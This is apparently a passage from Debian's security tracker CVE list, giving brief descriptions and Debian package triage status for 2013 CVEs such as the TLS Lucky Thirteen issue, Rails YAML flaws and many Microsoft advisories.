- libvirt 0.9.12-6 (bug #699224) [squeeze] - libvirt (Vulnerable code not present, see bug #699224) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=893450 NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=46532e3e8ed5f5a736a02f67d6c805492f9ca720 CVE-2013-0169 (The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as use ...) {DSA-2622-1 DSA-2621-1} - openssl 1.0.1e-1 (bug #699889) - bouncycastle 1.48+dfsg-2 (low; bug #699885) [wheezy] - bouncycastle (Minor issue) [squeeze] - bouncycastle (Minor issue) - polarssl 1.1.4-2 (bug #699887) - nss 2:3.14.3-1 (bug #699888) [squeeze] - nss (Minor issue) - openjdk-7 7u3-2.1.6-1 - openjdk-6 6b27-1.12.3-1 - gnutls26 2.12.20-4 [squeeze] - gnutls26 (Too intrusive to backport) - gnutls28 3.0.22-3 - cyassl 2.9.4+dfsg-1 - matrixssl (low) [squeeze] - matrixssl (Minor issue) [wheezy] - matrixssl (Minor issue) NOTE: matrixssl fixed this upstream in 3.4.1 - tlslite [wheezy] - tlslite (Minor issue) NOTE: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf CVE-2013-0168 (The MoveDisk command in Red Hat Enterprise Virtualization Manager (RHE ...) NOTE: RHEV management tool CVE-2013-0167 (VDSM in Red Hat Enterprise Virtualization 3 and 3.2 allows privileged ...) - vdsm (bug #668538) CVE-2013-0166 (OpenSSL before 0.9.8y, 1.0.0 before 1.0.0k, and 1.0.1 before 1.0.1d do ...) {DSA-2621-1} - openssl 1.0.1e-1 (bug #699889) CVE-2013-0165 (cartridges/openshift-origin-cartridge-mongodb-2.2/info/bin/dump.sh in ...) NOT-FOR-US: OpenShift CVE-2013-0164 (The lockwrap function in port-proxy/bin/openshift-port-proxy-cfg in Re ...) NOT-FOR-US: OpenShift CVE-2013-0163 (OpenShift haproxy cartridge: predictable /tmp in set-proxy connection ...) NOT-FOR-US: OpenShift haproxy cartridge CVE-2013-0162 (The diff_pp function in lib/gauntlet_rubyparser.rb in the ruby_parser ...) - ruby-parser 2.3.1-2 (bug #701637) NOTE: https://www.openwall.com/lists/oss-security/2013/02/22/5 CVE-2013-0161 (Havalite CMS 1.1.7 has a stored XSS vulnerability ...) 
NOT-FOR-US: Havalite CMS CVE-2013-0160 (The Linux kernel through 3.7.9 allows local users to obtain sensitive ...) {DSA-2669-1} - linux 3.8.12-1 (unimportant) - linux-2.6 (unimportant) NOTE: Minor information leak, rather a missing hardening feature than a security vulnerability. CVE-2013-0159 (The fedora-business-cards package before 1-0.1.beta1.fc17 on Fedora 17 ...) NOT-FOR-US: Fedora build script CVE-2013-0158 (Unspecified vulnerability in Jenkins before 1.498, Jenkins LTS before ...) - jenkins 1.480.2+dfsg-1~exp1 (bug #697617) NOTE: https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2013-01-04 CVE-2013-0157 ((a) mount and (b) umount in util-linux 2.14.1, 2.17.2, and probably ot ...) - util-linux 2.20.1-5.5 (bug #697464; low) [squeeze] - util-linux (Minor issue) [wheezy] - util-linux (Minor issue) CVE-2013-0156 (active_support/core_ext/hash/conversions.rb in Ruby on Rails before 2. ...) {DSA-2604-1} - rails 2.3.14.1 (bug #697722; high) - ruby-activesupport-2.3 2.3.14-5 (bug #697789) - ruby-activesupport-3.2 3.2.6-5 (bug #697790) NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: http://www.insinuator.net/2013/01/rails-yaml/ NOTE: https://www.openwall.com/lists/oss-security/2013/01/08/14 NOTE: experimental has 3.2.8-1 and should be affected too CVE-2013-0155 (Ruby on Rails 3.0.x before 3.0.19, 3.1.x before 3.1.10, and 3.2.x befo ...) {DSA-2609-1} - ruby-activerecord-3.2 3.2.6-4 (bug #697744) - ruby-activerecord-2.3 2.3.14-4 - ruby-actionpack-3.2 3.2.6-5 (bug #697802) - rails 2.3.14.1 NOTE: Starting with 2.3.14.1 rails is a transition package NOTE: https://www.openwall.com/lists/oss-security/2013/01/08/13 CVE-2013-0154 (The get_page_type function in xen/arch/x86/mm.c in Xen 4.2, when debug ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0153 (The AMD IOMMU support in Xen 4.2.x, 4.1.x, 3.3, and other versions, wh ...) 
{DSA-2636-1} - xen 4.1.4-2 CVE-2013-0152 (Memory leak in Xen 4.2 and unstable allows local HVM guests to cause a ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0151 (The do_hvm_op function in xen/arch/x86/hvm/hvm.c in Xen 4.2.x on the x ...) - xen (Only applies to Xen 4.2, which is only available in experimental) CVE-2013-0150 (Directory traversal vulnerability in an unspecified signed Java applet ...) NOT-FOR-US: F5 BIG-IP APM, FirePass and other F5 products CVE-2013-0149 (The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 throug ...) - quagga NOTE: OSPF protocol vulnerability, quagga implementation not affected CVE-2013-0148 (The Data Camouflage (aka FairCom Standard Encryption) algorithm in Fai ...) NOT-FOR-US: FairCom c-treeACE CVE-2013-0147 RESERVED CVE-2013-0146 RESERVED CVE-2013-0145 (Buffer overflow in the TFTPD service in Serva32 2.1.0 allows remote at ...) NOT-FOR-US: Serva32 CVE-2013-0144 (Cross-site request forgery (CSRF) vulnerability in cgi-bin/create_user ...) NOT-FOR-US: QNAP CVE-2013-0143 (cgi-bin/pingping.cgi on QNAP VioStor NVR devices with firmware 4.0.3, ...) NOT-FOR-US: QNAP CVE-2013-0142 (QNAP VioStor NVR devices with firmware 4.0.3, and the Surveillance Sta ...) NOT-FOR-US: QNAP CVE-2013-0141 (Directory traversal vulnerability in McAfee ePolicy Orchestrator (ePO) ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2013-0140 (SQL injection vulnerability in the Agent-Handler component in McAfee e ...) NOT-FOR-US: McAfee ePolicy Orchestrator CVE-2013-0139 (The Arecont Vision AV1355DN MegaDome camera allows remote attackers to ...) NOT-FOR-US: Arecont Vision CVE-2013-0138 (BitZipper 2013 before Update 1 allows remote attackers to execute arbi ...) NOT-FOR-US: BitZipper CVE-2013-0137 (The default configuration of the Digital Alert Systems DASDEC EAS devi ...) 
NOT-FOR-US: Digital Alert Systems and Monroe Electronics CVE-2013-0136 (Multiple directory traversal vulnerabilities in the EditDocument servl ...) NOT-FOR-US: Mutiny CVE-2013-0135 (Multiple SQL injection vulnerabilities in PHP Address Book 8.2.5 allow ...) NOT-FOR-US: PHP Address Book CVE-2013-0134 (Cross-site scripting (XSS) vulnerability in the web interface in AirDr ...) NOT-FOR-US: AirDroid CVE-2013-0133 (Untrusted search path vulnerability in /usr/local/psa/admin/sbin/wrapp ...) NOT-FOR-US: Parallels Plesk Panel CVE-2013-0132 (The suexec implementation in Parallels Plesk Panel 11.0.9 contains a c ...) NOT-FOR-US: Parallels Plesk Panel CVE-2013-0131 (Buffer overflow in the NVIDIA GPU driver before 304.88, 310.x before 3 ...) - nvidia-graphics-drivers 304.88-1 (bug #704547) [wheezy] - nvidia-graphics-drivers (Non-free not supported) [squeeze] - nvidia-graphics-drivers (Non-free not supported) NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3290 CVE-2013-0130 (Multiple buffer overflows in Core FTP before 2.2 build 1769 allow remo ...) NOT-FOR-US: Core FTP CVE-2013-0129 (Multiple cross-site scripting (XSS) vulnerabilities in pd-admin before ...) NOT-FOR-US: pd-admin CVE-2013-0128 (The Contact Customer Support feature in the TigerText Free Private Tex ...) NOT-FOR-US: TigerText CVE-2013-0127 (IBM Lotus Notes 8.x before 8.5.3 FP4 Interim Fix 1 and 9.0 before Inte ...) NOT-FOR-US: IBM Lotus Notes CVE-2013-0126 (Multiple cross-site request forgery (CSRF) vulnerabilities in index.cg ...) NOT-FOR-US: Verizon router CVE-2013-0125 (Cross-site scripting (XSS) vulnerability in fileview.asp in C2 WebReso ...) NOT-FOR-US: C2 WebResource CVE-2013-0124 (Multiple cross-site scripting (XSS) vulnerabilities in the administrat ...) NOT-FOR-US: ASKIA CVE-2013-0123 (Multiple SQL injection vulnerabilities in the administration interface ...) NOT-FOR-US: ASKIA CVE-2013-0122 (The avast! Mobile Security application before 2.0.4400 for Android all ...) NOT-FOR-US: avast! 
Mobile Security application CVE-2013-0121 RESERVED CVE-2013-0120 (The web interface on Dell PowerConnect 6248P switches allows remote at ...) NOT-FOR-US: Dell Switches CVE-2013-0119 RESERVED CVE-2013-0118 (CS-Cart before 3.0.6, when PayPal Standard Payments is configured, all ...) NOT-FOR-US: CS-Cart CVE-2013-0117 RESERVED CVE-2013-0116 RESERVED CVE-2013-0115 RESERVED CVE-2013-0114 RESERVED CVE-2013-0113 (Nuance PDF Reader 7.0 and PDF Viewer Plus 7.1 allow remote attackers t ...) NOT-FOR-US: Nuance PDF Reader CVE-2013-0112 RESERVED CVE-2013-0111 (daemonu.exe (aka the NVIDIA Update Service Daemon), as distributed wit ...) NOT-FOR-US: NVIDIA Update Service Daemon CVE-2013-0110 (nvSCPAPISvr.exe in the NVIDIA Stereoscopic 3D Driver service, as distr ...) NOT-FOR-US: NVIDIA Stereoscopic 3D Driver service CVE-2013-0109 (The NVIDIA driver before 307.78, and Release 310 before 311.00, in the ...) NOT-FOR-US: NVIDIA Display Driver service on Windows CVE-2013-0108 (An ActiveX control in HscRemoteDeploy.dll in Honeywell Enterprise Buil ...) NOT-FOR-US: Honeywell CVE-2013-0107 (Stack-based buffer overflow in Foxit Advanced PDF Editor 3 before 3.04 ...) NOT-FOR-US: Foxit Advanced PDF Editor CVE-2013-0106 RESERVED CVE-2013-0105 RESERVED CVE-2013-0104 RESERVED CVE-2013-0103 RESERVED CVE-2013-0102 RESERVED CVE-2013-0101 RESERVED CVE-2013-0100 REJECTED CVE-2013-0099 REJECTED CVE-2013-0098 REJECTED CVE-2013-0097 REJECTED CVE-2013-0096 (Writer in Microsoft Windows Essentials 2011 and 2012 allows remote att ...) NOT-FOR-US: Microsoft CVE-2013-0095 (Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for ...) NOT-FOR-US: Outlook in Microsoft Office for Mac CVE-2013-0094 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0093 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) 
NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0092 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0091 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0090 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0089 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0088 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0087 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0086 (Microsoft OneNote 2010 SP1 does not properly determine buffer sizes du ...) NOT-FOR-US: Microsoft OneNote CVE-2013-0085 (Buffer overflow in Microsoft SharePoint Server 2010 SP1 and SharePoint ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0084 (Directory traversal vulnerability in Microsoft SharePoint Server 2010 ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0083 (Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Serve ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0082 (Microsoft Office 2003 SP3 and 2007 SP3 allows remote attackers to exec ...) NOT-FOR-US: Microsoft CVE-2013-0081 (Microsoft SharePoint Portal Server 2003 SP3 and SharePoint Server 2007 ...) NOT-FOR-US: Microsoft CVE-2013-0080 (Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP ...) NOT-FOR-US: Microsoft SharePoint CVE-2013-0079 (Microsoft Visio Viewer 2010 SP1 allows remote attackers to execute arb ...) NOT-FOR-US: Microsoft Visio Viewer CVE-2013-0078 (The Microsoft Antimalware Client in Windows Defender on Windows 8 and ...) 
NOT-FOR-US: Microsoft Antimalware Client CVE-2013-0077 (Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2 ...) NOT-FOR-US: Microsoft Windows CVE-2013-0076 (The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Serv ...) NOT-FOR-US: Microsoft Windows CVE-2013-0075 (The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Serv ...) NOT-FOR-US: Microsoft Windows CVE-2013-0074 (Microsoft Silverlight 5, and 5 Developer Runtime, before 5.1.20125.0 d ...) NOT-FOR-US: Microsoft Silverlight CVE-2013-0073 (The Windows Forms (aka WinForms) component in Microsoft .NET Framework ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0072 REJECTED CVE-2013-0071 REJECTED CVE-2013-0070 REJECTED CVE-2013-0069 REJECTED CVE-2013-0068 REJECTED CVE-2013-0067 REJECTED CVE-2013-0066 REJECTED CVE-2013-0065 REJECTED CVE-2013-0064 REJECTED CVE-2013-0063 REJECTED CVE-2013-0062 REJECTED CVE-2013-0061 REJECTED CVE-2013-0060 REJECTED CVE-2013-0059 REJECTED CVE-2013-0058 REJECTED CVE-2013-0057 REJECTED CVE-2013-0056 REJECTED CVE-2013-0055 REJECTED CVE-2013-0054 REJECTED CVE-2013-0053 REJECTED CVE-2013-0052 REJECTED CVE-2013-0051 REJECTED CVE-2013-0050 REJECTED CVE-2013-0049 REJECTED CVE-2013-0048 REJECTED CVE-2013-0047 REJECTED CVE-2013-0046 REJECTED CVE-2013-0045 REJECTED CVE-2013-0044 REJECTED CVE-2013-0043 REJECTED CVE-2013-0042 REJECTED CVE-2013-0041 REJECTED CVE-2013-0040 REJECTED CVE-2013-0039 REJECTED CVE-2013-0038 REJECTED CVE-2013-0037 REJECTED CVE-2013-0036 REJECTED CVE-2013-0035 REJECTED NOT-FOR-US: Apache CXF CVE-2013-0034 REJECTED NOT-FOR-US: Apache CXF CVE-2013-0033 REJECTED CVE-2013-0032 REJECTED CVE-2013-0031 REJECTED CVE-2013-0030 (The Vector Markup Language (VML) implementation in Microsoft Internet ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0029 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) 
NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0028 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0027 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0026 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0025 (Use-after-free vulnerability in Microsoft Internet Explorer 8 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0024 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 al ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0023 (Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 a ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0022 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0021 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0020 (Use-after-free vulnerability in Microsoft Internet Explorer 9 allows r ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0019 (Use-after-free vulnerability in Microsoft Internet Explorer 7 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0018 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0017 REJECTED CVE-2013-0016 REJECTED CVE-2013-0015 (Microsoft Internet Explorer 6 through 9 does not properly perform auto ...) NOT-FOR-US: Microsoft Internet Explorer CVE-2013-0014 REJECTED CVE-2013-0013 (The SSL provider component in Microsoft Windows Vista SP2, Windows Ser ...) NOT-FOR-US: Microsoft Windows CVE-2013-0012 REJECTED CVE-2013-0011 (The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and W ...) 
NOT-FOR-US: Microsoft Windows CVE-2013-0010 (Cross-site scripting (XSS) vulnerability in Microsoft System Center Op ...) NOT-FOR-US: Microsoft System Center Opera Manager CVE-2013-0009 (Cross-site scripting (XSS) vulnerability in Microsoft System Center Op ...) NOT-FOR-US: Microsoft System Center Opera Manager CVE-2013-0008 (win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, ...) NOT-FOR-US: Microsoft Windows CVE-2013-0007 (Microsoft XML Core Services (aka MSXML) 4.0, 5.0, and 6.0 does not pro ...) NOT-FOR-US: Microsoft XML Core Services CVE-2013-0006 (Microsoft XML Core Services (aka MSXML) 3.0, 5.0, and 6.0 does not pro ...) NOT-FOR-US: Microsoft XML Core Services CVE-2013-0005 (The WCF Replace function in the Open Data (aka OData) protocol impleme ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0004 (Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5. ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0003 (Buffer overflow in a System.DirectoryServices.Protocols (S.DS.P) names ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0002 (Buffer overflow in the Windows Forms (aka WinForms) component in Micro ...) NOT-FOR-US: Microsoft .NET Framework CVE-2013-0001 (The Windows Forms (aka WinForms) component in Microsoft .NET Framework ...) NOT-FOR-US: Microsoft .NET Framework